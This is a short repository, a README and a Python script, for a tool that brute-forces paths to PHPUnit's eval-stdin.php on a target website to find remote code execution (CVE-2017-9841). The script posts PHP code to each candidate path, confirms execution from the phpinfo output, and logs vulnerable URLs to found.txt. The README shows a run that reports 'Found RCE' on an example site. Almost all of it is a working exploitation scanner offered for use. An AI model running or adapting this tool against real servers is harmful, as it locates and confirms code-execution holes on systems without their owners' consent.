├── README.md
└── phpunit-brute.py


/README.md:
--------------------------------------------------------------------------------
 1 | # phpunit-brute
 2 | 
 3 | Tool to try multiple paths for PHPunit RCE (CVE-2017-9841) and it will log found paths to found.txt in the dir.
 4 | 
 5 | It uses the following list of paths `https://raw.githubusercontent.com/random-robbie/bruteforce-lists/master/phpunit.txt`
 6 | 
 7 | if you have a path that is not on there please submit a PR
 8 | 
 9 | 
10 | ```
11 | usage: phpunit-brute.py [-h] -u URL [-p PROXY]
12 | phpunit-brute.py: error: the following arguments are required: -u/--url
13 | ```
14 | 
15 | 
16 | Example
17 | ---
18 | 
19 | ```
20 | python3 phpunit-brute.py -u http://someoldwebsite.com
21 | 
22 | 
23 | [-] No Luck for /_inc/vendor/stripe/stripe-php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
24 | [-] No Luck for /_staff/cron/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
25 | [-] No Luck for /_staff/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
26 | [-] No Luck for /~champiot/Laravel E2N test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
27 | [-] No Luck for /~champiot/Laravel%20E2N%20test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
28 | [-] No Luck for /~champiot/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
29 | [-] No Luck for /172410101040/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
30 | [-] No Luck for /1board/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
31 | [-] No Luck for /20170811125232/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
32 | [+] Found RCE for http://someoldwebsite.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [+]
33 | ```
34 | 


--------------------------------------------------------------------------------
/phpunit-brute.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #
 3 | # 
 4 | #
 5 | # phpunit-brute.py - Finding paths to phpunit to gain RCE. (CVE-2017-9841)
 6 | #
 7 | # By @RandomRobbieBF
 8 | # 
 9 | #
10 | 
11 | import requests
12 | import sys
13 | import argparse
14 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
15 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
16 | session = requests.Session()
17 | 
18 | 
19 | parser = argparse.ArgumentParser()
20 | parser.add_argument("-u", "--url", required=True ,default="http://localhost",help="URL to test")
21 | parser.add_argument("-p", "--proxy", default="http://127.0.0.1:8085",required=False, help="Proxy for debugging")
22 | 
23 | args = parser.parse_args()
24 | url = args.url
25 | proxy = args.proxy
26 | 
27 | 
28 | 
29 | 
30 | http_proxy = proxy
31 | proxyDict = { 
32 |               "http"  : http_proxy, 
33 |               "https" : http_proxy, 
34 |               "ftp"   : http_proxy
35 |             }
36 |             
37 |             
38 | 
39 | 
40 | 
41 | def test_url(url,urlpath):
42 | 	newurl = ""+url+""+urlpath+""
43 | 	rawBody = "<?php phpinfo();"
44 | 	headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*","Content-Type":"application/x-www-form-urlencoded"}
45 | 	try:
46 | 		response = session.post(newurl, headers=headers,verify=False,data=rawBody, proxies=proxyDict,timeout=30)
47 | 		if response.status_code == 200:
48 | 			if "PHP License as published by the PHP Group" in response.text:
49 | 				print("[+] Found RCE for "+newurl+" [+]")
50 | 				text_file = open("found.txt", "a")
51 | 				text_file.write(""+newurl+"\n")
52 | 				text_file.close()
53 | 				return True
54 | 			else:
55 | 				print("[-] No Luck for "+urlpath+" [-]")
56 | 		else:
57 | 			print("[-] No Luck for "+urlpath+" [-]")
58 | 	except:
59 | 		print ("[-]Check Url might have Issues[-]")
60 | 		sys.exit(0)
61 | 			
62 | 			
63 | def grab_paths(url):
64 | 	headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
65 | 	try:
66 | 		response = session.get("https://raw.githubusercontent.com/random-robbie/bruteforce-lists/master/phpunit.txt", headers=headers,verify=False, proxies=proxyDict)
67 | 		lines = response.text.strip().split('\n')
68 | 		for urlpath in lines:
69 | 			loop = test_url(url,urlpath)
70 | 			if loop:
71 | 				break
72 | 	except:
73 | 		print("[-] Failed to obtain paths file [-]")
74 | 		sys.exit(0)
75 | 				
76 | 	
77 | grab_paths(url)
78 | 


--------------------------------------------------------------------------------